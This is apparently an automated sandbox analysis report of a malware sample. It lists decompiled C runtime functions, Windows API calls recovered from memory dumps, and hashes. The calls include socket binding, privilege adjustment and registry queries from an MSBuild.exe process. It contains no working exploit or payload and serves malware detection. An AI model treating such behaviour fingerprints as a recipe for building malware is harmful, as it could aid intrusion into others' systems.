Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 077082995fa2a72eba26aacc34e4eca3c0fe3308b82342010390401acd0bbba4
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: BA01497A44014ABBCF125F84DC42DEE7F32BB9E354B588415FE1858131D336C9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A39E3A, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00A39E3A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0xa4e280);
				E00A34010(__ebx, __edi, __esi);
				_t28 = E00A32E42();
				_t40 = E00A34B0B(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E00A34EF8(_t28, __edx, 1, _t40, __eflags);
					E00A35313(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E00A34934(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E00A34C69( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E00A3A509();
					E00A34934(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E00A3A515();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E00A359B3(_t43))) = 0xc;
					_t24 = 0;
				}
				return E00A34055(_t24);
			}

0x00a3a46f
0x00a3a471
0x00a3a476
0x00a3a480
0x00a3a48f
0x00a3a491
0x00a3a494
0x00a3a496
0x00a3a4a7
0x00a3a4ac
0x00a3a4b4
0x00a3a4b9
0x00a3a4be
0x00a3a4c4
0x00a3a4ca
0x00a3a4d0
0x00a3a4d7
0x00a3a4de
0x00a3a4e4
0x00a3a4ea
0x00a3a4ee
0x00a3a4ef
0x00a3a4f6
0x00a3a4fb
0x00a3a498
0x00a3a49d
0x00a3a4a3
0x00a3a4a3
0x00a3a502

APIs

Part of subcall function 00A32E42: __getptd_noexit.LIBCMT ref: 00A32E43
Part of subcall function 00A32E42: __amsg_exit.LIBCMT ref: 00A32E50

__calloc_crt.LIBCMT ref: 00A3A488

Part of subcall function 00A34B0B: __calloc_impl.LIBCMT ref: 00A34B1A

__lock.LIBCMT ref: 00A3A4BE
___addlocaleref.LIBCMT ref: 00A3A4CA
__lock.LIBCMT ref: 00A3A4DE

Part of subcall function 00A359B3: __getptd_noexit.LIBCMT ref: 00A359B3

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: cbf4a39cca2a76cfe4d0344c1dc8c0266ecc8e0ec2691320b00c3b08d41f09ae
Instruction ID: 5ac9f4fef387f858bcadd43886cf70d4a4ae5aab7a96b0e87b16a3e3e0ec9ad7
Opcode Fuzzy Hash: cbf4a39cca2a76cfe4d0344c1dc8c0266ecc8e0ec2691320b00c3b08d41f09ae
Instruction Fuzzy Hash: A4017131A05310EFE760FFB89A03B1DB7E0AF99720F214549F4D59B2D2CBB499418B62

Uniqueness

Uniqueness Score: -1.00%

Function 00A38DCB, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A38DCB(void* __ebx, void* __ecx, void* __edx, void* __esi) {
				int __edi;
				void* _t14;
				void* _t19;
				void* _t20;
				void* _t22;
				signed int _t23;

				_t19 = __edx;
				if(__esi != 0) {
					__ebx + __ebx = E00A38E70(__esi, __edi, __ebx + __ebx);
					__eax = MultiByteToWideChar( *(__ebp + 0x1c), 1,  *(__ebp + 0x10),  *(__ebp + 0x14), __esi, __ebx);
					if(__eax != 0) {
						__edi = __eax;
					}
					E00A38D10(__esi) = __edi;
				}
				_pop(_t20);
				_pop(_t22);
				_pop(_t14);
				return E00A36DA9(_t14,  *(_t23 - 4) ^ _t23, _t19, _t20, _t22);
			}

0x00a38dcb
0x00a38dd2
0x00a38dda
0x00a38def
0x00a38df7
0x00a38e07
0x00a38e07
0x00a38e10
0x00a38e10
0x00a38e15
0x00a38e16
0x00a38e17
0x00a38e25

APIs

_memset.LIBCMT ref: 00A38DDA
MultiByteToWideChar.KERNEL32(?,00000001,?,?), ref: 00A38DEF
GetStringTypeW.KERNEL32(?,?,00000000,?), ref: 00A38E01
__freea.LIBCMT ref: 00A38E0A

Memory Dump Source

Source File: 00000000.00000002.222951282.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.222947736.0000000000A30000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222966800.0000000000A49000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222973406.0000000000A50000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222977157.0000000000A53000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.222981625.0000000000A54000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringTypeWide__freea_memset
String ID:
API String ID: 1206527432-0
Opcode ID: 6f42836921ee3f95063e62524d44ba2e3419586c9d3e2f199f45f6ee6115d58c
Instruction ID: 769eff082ac6e975cef3b56a77619e5ec3e3e76ef77987f39034faf3ef2d2529
Opcode Fuzzy Hash: 6f42836921ee3f95063e62524d44ba2e3419586c9d3e2f199f45f6ee6115d58c
Instruction Fuzzy Hash: 55F09076600109BFDF11AFA1AC469EF3F6AEF89360F140015FC0985051DA268D21CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exe PID: 6440 Parent PID: 6380 MSBuild.exeCOMMON

Executed Functions

Function 02CDB2A8, Relevance: 2.2, Strings: 1, Instructions: 912COMMON

Download Yara Rule

Strings

r, xrefs: 02CDBD5C

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 5f77500487fd757231b40ce5c16bb394cbd6610d48d5887247ac8bd1e58cb004
Instruction ID: cc0cf299d404f66617ca9c2b5b407c2da722229ecdb8ed32d9abce49ac7b61f5
Opcode Fuzzy Hash: 5f77500487fd757231b40ce5c16bb394cbd6610d48d5887247ac8bd1e58cb004
Instruction Fuzzy Hash: 67824774A00615CFCB14CF68C480AAEFBB2FF88314F668569D55AAB655DB30ED81CF90

Uniqueness

Uniqueness Score: -1.00%

Function 052E28FB, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E298F

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 2ecb00d70642e073f07a71e93a970f29e02f1dfaaa07bcdd46ddacadce0a1355
Instruction ID: 8261993b63a6607aaf2f2a830e2bc9a03008a29b70fb1ea26beb102ac8d1cb27
Opcode Fuzzy Hash: 2ecb00d70642e073f07a71e93a970f29e02f1dfaaa07bcdd46ddacadce0a1355
Instruction Fuzzy Hash: F3219475509384AFE7128F21CC84FA6BFB8EF46610F1884DBE985CF152D364A905C771

Uniqueness

Uniqueness Score: -1.00%

Function 052E1463, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 052E14E3

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e0ecd32deaaf50e0b5abce2005c7ca6431b10bb333fa5bc499ebdcc67f17a587
Instruction ID: 01d83ae3ece0b8038ef2d9725ec0a95db37f87618bad742a8cf36b76d6f1f033
Opcode Fuzzy Hash: e0ecd32deaaf50e0b5abce2005c7ca6431b10bb333fa5bc499ebdcc67f17a587
Instruction Fuzzy Hash: 9C2191765097849FDB238F25DC44B62BFB4EF06210F0885EAE9898F563D2749918CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E2E76, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSARecv.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E2EE6

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: Recv
String ID:
API String ID: 4192927123-0
Opcode ID: ec4b8769dc8e82588b2e982331391126dfc61d19effa4ecef41c945c2ebe4c85
Instruction ID: 8af19ac1a5e0f2b3e9a1577ac7216fff043c3a534663e334f86261cbfa0ed399
Opcode Fuzzy Hash: ec4b8769dc8e82588b2e982331391126dfc61d19effa4ecef41c945c2ebe4c85
Instruction Fuzzy Hash: 3711AF72400704AFEB22CF51DC44FABFBACEF48710F14896AEA4A9B151D374A419CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052E292E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E298F

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: 1a06a8b29ca2f4f26936554c1dc881b8a440f04415ff0781ac4a195d3a56ae37
Instruction ID: 343610f34b498af3e4e143c3c6fc4ffe773556e9ed453008d56cbaa032638cb9
Opcode Fuzzy Hash: 1a06a8b29ca2f4f26936554c1dc881b8a440f04415ff0781ac4a195d3a56ae37
Instruction Fuzzy Hash: E3119075500200AFE721CF55DC84FAAFBACEF44710F5484AAED4A8B241D374A804CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 052E149A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 052E14E3

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: f5e2b74ca7d3a2396e70f1cb554fd32b1a3d90c4cf4531647f609aa97696a627
Instruction ID: b8ec92da7e6b7ec6219582018e321ea7c49f8aa2445cd82cbce053ad46536152
Opcode Fuzzy Hash: f5e2b74ca7d3a2396e70f1cb554fd32b1a3d90c4cf4531647f609aa97696a627
Instruction Fuzzy Hash: 3511A0725006009FDB21CF55D844B66FBE4EF04320F08C4AADE4A8B612D371E814CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E17E8, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052E1845

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 1695287d349e244f6c34e2bca86373b7d06ca930d5a3501a6cd1c7dd26e8b2a3
Instruction ID: f9311b13cdb9064d49b118cac5662f6b4ac4f63a4d40e97515eb1c0eca9032e2
Opcode Fuzzy Hash: 1695287d349e244f6c34e2bca86373b7d06ca930d5a3501a6cd1c7dd26e8b2a3
Instruction Fuzzy Hash: CB11A071409380AFDB22CF15DC45E62FFB4EF06220F08C49EED894B662D275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 052E11C2, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 052E11F4

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 56c1d01766b844e9aa9d5abbfa74fa8d0161b2b6d6cd3af5a885d36a08b25931
Instruction ID: e5d4eaf1e5772db31288cd840e73d35ed4a18a9302a27b93d0e8870ebc19c4e7
Opcode Fuzzy Hash: 56c1d01766b844e9aa9d5abbfa74fa8d0161b2b6d6cd3af5a885d36a08b25931
Instruction Fuzzy Hash: 6D01A270914240DFDB20CF55E884766FBA4EF44720F48C4AADD498F202D275A814CB62

Uniqueness

Uniqueness Score: -1.00%

Function 052E180A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 052E1845

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 2e7af4d1239c530df9ce2e9ce17f482ed7687fa86097e8a3c9dc08bdeec2538b
Instruction ID: 072c4ec99822bf61b5d9511a49af7a3d4f187d34df6db5e0eca6dedbb4098f52
Opcode Fuzzy Hash: 2e7af4d1239c530df9ce2e9ce17f482ed7687fa86097e8a3c9dc08bdeec2538b
Instruction Fuzzy Hash: 43018F35810640DFEB21CF05D844B66FBA1FF04720F08C0AADE894B612D375A428CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02CD3850, Relevance: .8, Instructions: 751COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 073841a626569531d5f00f46c499cb1dae8a16dc5f0f35b8def26fcafb405270
Instruction ID: 5dd7b401946f3ad1253671923ed675db223561f9b4e092c579ef395072a2f0f5
Opcode Fuzzy Hash: 073841a626569531d5f00f46c499cb1dae8a16dc5f0f35b8def26fcafb405270
Instruction Fuzzy Hash: BC52E571A00295CFCB15CF68C88496AFBB2FF85304B1985EADA099F256C731ED45CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02CD23A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc071f98a2821b2e517f6dabcfc1728823e0ba9f55d2f6c9451b2445c28d896
Instruction ID: 797202e0deb5ee7a2a0068b1de5d77170aa0aca75c4fe9b93e50656e75334e5d
Opcode Fuzzy Hash: 4fc071f98a2821b2e517f6dabcfc1728823e0ba9f55d2f6c9451b2445c28d896
Instruction Fuzzy Hash: 2612AA70E00215CFDB24CF35D4886ADBBF2FB88305F148169DA16AB296DB789D46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 02CD89D8, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffd009a99c2451ee7128c07645c80173d1b2feaa415400f76e0db70db60a43bb
Instruction ID: 9ff9bd50ab562f316d0499037c6d9e7e7ffc59eb79d231fb163c51fdaf4a96a7
Opcode Fuzzy Hash: ffd009a99c2451ee7128c07645c80173d1b2feaa415400f76e0db70db60a43bb
Instruction Fuzzy Hash: 0F12DF34E04625CFCB28DF65D8853AEBBF2FF84304F548669E116AB241DB799D82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02CD2FA8, Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482326365.0000000002CD0000.00000040.00000001.sdmp, Offset: 02CD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ef090ed634088b9197f744de1f175a5418c84f8a603d6a6d252061025dcccf
Instruction ID: 1e24596fabcf7e7a90557e96988580ab4acc26cc933008a0af364b964d0d30cc
Opcode Fuzzy Hash: 08ef090ed634088b9197f744de1f175a5418c84f8a603d6a6d252061025dcccf
Instruction Fuzzy Hash: 14819C31F011559BD714DB69C884A6EB7F3AFC8310F2A80B9E51AEB355DE34AC01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 052E1950, Relevance: 1.6, APIs: 1, Instructions: 123registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 052E1A46

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f98221eee10d855f151e767d8f8e78ebc302b32d6d5732adb45d1907248ac6e2
Instruction ID: 1765bfb41be4658b683834b773864740f5375e9a695f1a45b3005e27af30097d
Opcode Fuzzy Hash: f98221eee10d855f151e767d8f8e78ebc302b32d6d5732adb45d1907248ac6e2
Instruction Fuzzy Hash: 4841466540E3C15FD3138B318C65A61BFB4EF47614B0E85CBD884CF5A3D269690AC772

Uniqueness

Uniqueness Score: -1.00%

Function 052E0EB8, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E2C), ref: 052E0F5B

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8429121dc7aeb47d67e77d6fd6bc437ff54cc9a82fb46b8e4574236c5cd2d5a7
Instruction ID: 8cbdc9ec0d0577d0eda25e3c16a358825a8daeeb1574b056faca3e58262c982f
Opcode Fuzzy Hash: 8429121dc7aeb47d67e77d6fd6bc437ff54cc9a82fb46b8e4574236c5cd2d5a7
Instruction Fuzzy Hash: 9031E272404345AFEB228B21CC44F6BBFACEF45720F0489AEF985CB152D364A919CB70

Uniqueness

Uniqueness Score: -1.00%

Function 052E0C58, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNELBASE(?,00000E2C,?,?), ref: 052E0D1A

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileNameTemp
String ID:
API String ID: 745986568-0
Opcode ID: 7fc33c18e6f763a92aa3efcd12aa855a40a5e2a15ffc7211783e73c6c8f11043
Instruction ID: 6bdb3e935b492a8add098d419126a9d028a50dc99bc4bb45bf47ef1293f74ab0
Opcode Fuzzy Hash: 7fc33c18e6f763a92aa3efcd12aa855a40a5e2a15ffc7211783e73c6c8f11043
Instruction Fuzzy Hash: 7A315C7140D3C06FD7038B258C61B62BFB4EF87610F0E85DBD9848F5A3D225A91AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 052E0390, Relevance: 1.6, APIs: 1, Instructions: 93registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,00000E2C), ref: 052E045E

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 39b492ffddfacb05a53b4df3364087df3d5796104b9b8295d58277bb5194281c
Instruction ID: 3971bc491fdea1decf4a9de791f6fcfa250dcb0af96d0e6c67c821d793d8474f
Opcode Fuzzy Hash: 39b492ffddfacb05a53b4df3364087df3d5796104b9b8295d58277bb5194281c
Instruction Fuzzy Hash: E431C472004345AFE7228F11CC45FA6FBB8EF06714F14899EEA858B192D3B5A949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 012CAA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 012CAAB1

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 12883b450908099ad867b565a9f31a7b7934a3221793ed7fd7d8baf3ce9744de
Instruction ID: cf3b3f08cfa20f4528c66f4f866bfacb8961ea6c4ad1600ffa4b8f496eb556b7
Opcode Fuzzy Hash: 12883b450908099ad867b565a9f31a7b7934a3221793ed7fd7d8baf3ce9744de
Instruction Fuzzy Hash: 0E31D472504385AFE7228B25CC45F6BBFBCEF45610F0885AAEE818B152D364A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E07F4, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 052E0899

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5699f6c3196c74c0dc07e0078a6da22617088457a1573cd3776f0c81ab83b6c0
Instruction ID: 1c3e73cd4dd3007940d67bcec9462eed45a4c9df49f3cc1b0065c97752b2b721
Opcode Fuzzy Hash: 5699f6c3196c74c0dc07e0078a6da22617088457a1573cd3776f0c81ab83b6c0
Instruction Fuzzy Hash: 7031ADB1504380AFE722CF25CC44F66BFE8EF45610F0884AEE9898B252D375E809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E0FB9, Relevance: 1.6, APIs: 1, Instructions: 91COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E105C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: df7f2a6c326e1c792567b3a47b53aeff36b5ecee2740ce8c3e2a957c090aa858
Instruction ID: ca83d6b78c737bcb62aba92598e665cc26af3a63952c9cf5def4115aefc2a48a
Opcode Fuzzy Hash: df7f2a6c326e1c792567b3a47b53aeff36b5ecee2740ce8c3e2a957c090aa858
Instruction Fuzzy Hash: CC31C3715093C06FEB12CB21DC55FA6BFA8EF42610F1984DAE9848F1A3D764A909C771

Uniqueness

Uniqueness Score: -1.00%

Function 012CAAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 012CABB4

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bffaf1c11f350a15f6bd72da05199b4aae33762d50f67020a76a575c10666515
Instruction ID: 69c1237d6a30addfac5a3e9a4664385d470aba69b9a432bf3ef432998de1c46b
Opcode Fuzzy Hash: bffaf1c11f350a15f6bd72da05199b4aae33762d50f67020a76a575c10666515
Instruction Fuzzy Hash: A931B3715093846FE722CB25CC44F66BFB8EF46610F08859EEA85CB153E360E548CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E2720, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E27BD

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: a2f1c591f8f988d37dd4ea4915f8d409d116fee0beb9d933e1ba0a5dc1926d33
Instruction ID: 65250b2e5555870c3f9f87f6c9d80939c90ba85b654f632d472fb4fb16cfaea5
Opcode Fuzzy Hash: a2f1c591f8f988d37dd4ea4915f8d409d116fee0beb9d933e1ba0a5dc1926d33
Instruction Fuzzy Hash: D231E572409380AFE7128F21DC45FA6BFB8EF46710F04859AE9859F193D364A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 052E00F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 052E019D

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: cad4aef439001095aa9897f511d5414943a9fae0cfdb31dbc3c31f8f76cc2b77
Instruction ID: 6ed412867c82df7c405633a3e964c54b93a3ac842efbb0d170be65065248674e
Opcode Fuzzy Hash: cad4aef439001095aa9897f511d5414943a9fae0cfdb31dbc3c31f8f76cc2b77
Instruction Fuzzy Hash: 0031A471509780AFE712CB25DC44F56FFF8EF46610F08849AE985CF292D375A909C761

Uniqueness

Uniqueness Score: -1.00%

Function 052E22B4, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 052E2366

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 2522abc6b109cf6dbe671947236674d79369804d9d3485a11fa65b3de1877e67
Instruction ID: a75e82f323347a5786c0fb1130eca9a66140d3e46a683d946fe1736403079b7a
Opcode Fuzzy Hash: 2522abc6b109cf6dbe671947236674d79369804d9d3485a11fa65b3de1877e67
Instruction Fuzzy Hash: D031C2B2404780AFE722CB15DC45F66FFF8FF06720F04859EE9858B292D365A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E01F4, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 052E0264

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5b0a49a73953da625347e64cfc8ecd28aa7fdad66e442de645d7dd6e66e21565
Instruction ID: 57b80f3315af828cad11e6cdbe22599ee4585911017d6adb8147ca100558e118
Opcode Fuzzy Hash: 5b0a49a73953da625347e64cfc8ecd28aa7fdad66e442de645d7dd6e66e21565
Instruction Fuzzy Hash: 782106B29053849FE712CF14EC45BA5BFA8FF42220F0880EBDD488F652D375A909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 052E04AB, Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,7DB54636,00000000,00000000,00000000,00000000), ref: 052E055C

Memory Dump Source

Source File: 00000002.00000002.484801846.00000000052E0000.00000040.00000001.sdmp, Offset: 052E0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9843a90eb1e71b2d3d9c68df27c8ae9480c636a5ca40bcb31366a27280c4865c
Instruction ID: c15287220a58b281d5bf5bfeaab6a45f743c8fff6880698dd5e91dcc9a7bc10d
Opcode Fuzzy Hash: 9843a90eb1e71b2d3d9c68df27c8ae9480c636a5ca40bcb31366a27280c4865c
Instruction Fuzzy Hash: EF319571509780AFD722CB25DC44F66BFF8EF46610F0885DAE9858B1A3D364E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 012CA120, Relevance: 1.6, APIs: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,00000E2C,?,?), ref: 012CA1C2

Memory Dump Source

Source File: 00000002.00000002.481046593.00000000012CA000.00000040.00000001.sdmp, Offset: 012CA000, based on PE: false

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 4925376229e74924d7a606c7e85b1ad02ef0213d9d5511f8eaee019549992964
Instruction ID: 88d28d791fd02afcd6bbb36256058e0a8ac56c334007f610af6be14132cd14a5
Opcode Fuzzy Hash: 4925376229e74924d7a606c7e85b1ad02ef0213d9d5511f8eaee019549992964
Instruction Fuzzy Hash: 3531D07140D3C06FD3038B258C50B66BFB4EF87620F1981CBD9848F193D228A91ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 052E2F48, Relevance: 1.6, APIs: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E2C,?,?), ref: 052E2FEA

Memory Dump Source

